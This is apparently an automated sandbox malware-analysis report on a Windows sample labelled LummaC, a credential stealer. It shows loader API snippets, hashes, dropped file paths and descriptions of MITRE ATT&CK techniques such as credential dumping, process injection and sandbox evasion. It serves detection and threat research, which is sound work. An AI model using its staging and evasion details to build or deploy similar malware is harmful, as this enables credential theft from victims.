Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6d88c9f915de907ef9b303ecadc4ae88c7ed1e43fcf142d2694ecb505292e85d
Instruction ID: f803f23a6cd725a30f5e037447a14d637c6a4f72935564b6a861f0103398a2e9
Opcode Fuzzy Hash: 6d88c9f915de907ef9b303ecadc4ae88c7ed1e43fcf142d2694ecb505292e85d
Instruction Fuzzy Hash: 11F0F971B4521966CB08E3A88C82EFE3768FF01314F040D15B863E77C2DA64580D4266

Function 008B11F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008B1205

Strings

AutoIt, xrefs: 008B11F9
Error allocating memory., xrefs: 008B11FE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 71fd72565bdb7eb99a0e56ad2d7c5293d459e90aaead62564ab7a23e062a7639
Instruction ID: ed540a3e71e971000d7581abd64d68752fd98c2e85cd03d51f3e65ef4ce09e2e
Opcode Fuzzy Hash: 71fd72565bdb7eb99a0e56ad2d7c5293d459e90aaead62564ab7a23e062a7639
Instruction Fuzzy Hash: 3FE0D83228875867D21537987C03FC57A85FF05B51F608416FA4CD91C24AE2648455EA

Function 00871092 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0086FBC6: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008710C1,?,?,?,0085100A), ref: 0086FBCB

IsDebuggerPresent.KERNEL32(?,?,?,0085100A), ref: 008710C5
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0085100A), ref: 008710D4

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008710CF

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 355c419d423c2a2fd8a6d92ff4e0170f6d6e0064766e2d07694bc2242d61d73a
Instruction ID: f4065a1d91a822436c76dbb541506d06c9a19d1e08d28ce1b7cad70b73061aa0
Opcode Fuzzy Hash: 355c419d423c2a2fd8a6d92ff4e0170f6d6e0064766e2d07694bc2242d61d73a
Instruction Fuzzy Hash: 41E03970600B818EC720AF79E5487127BE0FB00700B008D5DE98AC6A52DBB5E48C8BA1

Function 008C3702 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 008C371A
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 008C372F

Strings

aut, xrefs: 008C3723

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 5d7aec70ba9e814f8e39901ae3e3a1d132cc8d8ce1e0c7934ac28e14eb2dc362
Instruction ID: d423ffb441798460424f51d08811d6dc89d54e70b66957dbd15cf1411c838bf0
Opcode Fuzzy Hash: 5d7aec70ba9e814f8e39901ae3e3a1d132cc8d8ce1e0c7934ac28e14eb2dc362
Instruction Fuzzy Hash: B2D05B7154031867DA2097509C4DFDB7A6CDB44710F0005517B5595091DAB0E585C790

Function 008AE4B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 008AE4BA

Strings

X64, xrefs: 008AE542
%.3d, xrefs: 008AE4C5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: d0e623573312377a60e9a73a032e89919b1ba07f553e59c96dd5327351a1f99d
Instruction ID: f002769871d64200e614716e9115e9f17ec2033780c8efdb45ce624a4990e8c4
Opcode Fuzzy Hash: d0e623573312377a60e9a73a032e89919b1ba07f553e59c96dd5327351a1f99d
Instruction Fuzzy Hash: FDD01265C0511DE9DB509694AC48CB9777CFB09308F548852F506D5501F724D548AB22

Function 008E2ADD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2AE7
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008E2AFA

Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034

Strings

Shell_TrayWnd, xrefs: 008E2AE0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 508f808c294b4450cac9a9abf799748529c913a5258b5a7bd0c13715cfe4c4c6
Instruction ID: 28edb5614be8e30745b4c22d659b8fb3c05956f56fe1bc048a9052e8c16158db
Opcode Fuzzy Hash: 508f808c294b4450cac9a9abf799748529c913a5258b5a7bd0c13715cfe4c4c6
Instruction Fuzzy Hash: 77D0C931384351AAE2646770AC4BFD6AA54BB51B11F1008257649AE3D0C9A468448654

Function 008E2B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2B27
PostMessageW.USER32(00000000), ref: 008E2B2E

Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034

Strings

Shell_TrayWnd, xrefs: 008E2B20

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 576ec6b2e816a165c40c32815ca732956e508574eb4176c6e27e7c43a3a3a948
Instruction ID: 463c7d31c1e3396cd37cc3c47451c5621c490b1f3fd4b2b2972aace3f5ba3d11
Opcode Fuzzy Hash: 576ec6b2e816a165c40c32815ca732956e508574eb4176c6e27e7c43a3a3a948
Instruction Fuzzy Hash: 46D0C931381351AAF2656770AC4BFD6AA54BB55B11F1008257645EE3D0C9A468448654

Function 0088C14E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0088C1E4
GetLastError.KERNEL32 ref: 0088C1F2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0088C24D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 4f2eca018d1ebdcad12161a9aeaa1a300a05ff9c21f639ad16a9f81e168f7ecb
Instruction ID: 5143f5fe22d9434917d1740a9b5e9c0217147c5d77c9b39cbdf7bd52ea8a5dec
Opcode Fuzzy Hash: 4f2eca018d1ebdcad12161a9aeaa1a300a05ff9c21f639ad16a9f81e168f7ecb
Instruction Fuzzy Hash: F641B431600246AFCB21AFE8C984AAE7BA5FF42720F254159E859DB1E9DB309D01CB71

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 80441fcf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\o

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Affordable

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Increasingly

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ink

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inventory

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inventory.bat (copy)

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rounds

Static File Info

General

Windows Analysis Report
80441fcf.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre